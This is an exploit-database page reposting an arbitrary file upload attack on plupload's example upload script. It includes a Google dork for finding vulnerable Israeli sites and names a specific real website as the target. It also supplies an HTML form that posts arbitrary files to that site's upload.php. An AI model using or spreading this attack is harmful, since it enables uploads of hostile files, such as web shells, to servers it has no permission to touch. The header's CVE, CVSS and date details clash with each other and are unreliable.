Advertisement






Israel Media Vendor Pupload - Arbitary File Upload

CVE Category Price Severity
CVE-2021-41379 CWE-264 $5,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-05-11
CPE
cpe:cpe:/a:israel-media-vendor:pupload
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018050074

Below is a copy:

Israel Media Vendor Pupload - Arbitary File Upload
########################################## 
# Exploit Title : Israel Media Vendor Pupload - Arbitary File Upload
# Dork : inurl:/plupload/ -inurl:(php) intitle:index of  site:co.il
# Date : 11:41 PM 12/9/2017 
# Exploit Author: Misterklio 
# Category: Webapps 
# Language: PHP 
# Tested on: windows 7 / FireFox ##########################################


Info : ______________________________________________________________________

#view : https://www.alpinestyle.co.il/media/vendor/plupload/bower.json
#Test Upload : https://www.alpinestyle.co.il/media/vendor/plupload/examples/upload.php
 
vendor Source :

{
"name": "plupload",
"license": "AGPLv3",
"authors": [
"Davit Barbakadze <[email protected]>"
],
"homepage": "http://plupload.com",
"repository": {
"type": "git",
"url": "https://github.com/moxiecode/plupload.git"
},
"main": [
"./js/plupload.full.min.js"
],
"ignore": [
"tests/",
"src/",
"build/",
"examples/",
"Jakefile.js",
"package.json",
"bower.json",
"composer.json",
"README.md",
".*"
]
}
 ______________________________________________________________________
#Tools :

<!DOCTYPE html>
<html>
<body>

<form action="https://www.alpinestyle.co.il/media/vendor/plupload/examples/upload.php" method="post" enctype="multipart/form-data">

    <input type="file" name="file" id="file">
    <input type="submit" value="Upload" name="submit">
</form>

</body>
</html>
 ______________________________________________________________________
 
 Enjoy By Mister klio

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum